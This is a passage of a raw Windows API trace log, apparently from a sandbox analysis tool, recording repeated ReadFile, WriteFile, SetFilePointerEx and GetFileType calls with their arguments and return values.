0x4c [0094.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.226] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.226] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] GetFileType (hFile=0x4c) returned 0x1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] GetFileType (hFile=0x4c) returned 0x1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] GetFileType (hFile=0x4c) returned 0x1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] GetFileType (hFile=0x4c) returned 0x1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, 
lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] GetFileType (hFile=0x4c) returned 0x1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.227] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.227] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] GetFileType (hFile=0x4c) returned 0x1 [0094.227] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.227] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.228] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.228] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.228] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.228] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.228] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.228] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.228] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.228] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.228] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.228] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.228] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.228] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.228] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.228] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.229] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.229] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.229] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: 
lpNewFilePointer=0x0) returned 1 [0094.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.229] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.229] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.229] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.229] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.230] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, 
lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.230] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.230] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.230] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.230] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.230] _get_osfhandle (_FileHandle=4) returned 0x54 
[0094.230] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.230] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.231] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.231] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.231] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.231] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.231] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.231] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.231] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.232] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, 
lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.232] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.232] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.232] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.232] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.232] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0094.232] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.232] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.233] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.233] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.233] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 
[0094.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.233] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.233] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.233] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.234] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.234] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.234] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.234] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.234] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.234] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.234] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.234] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.234] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.234] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.234] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.234] ReadFile (in: hFile=0x54, 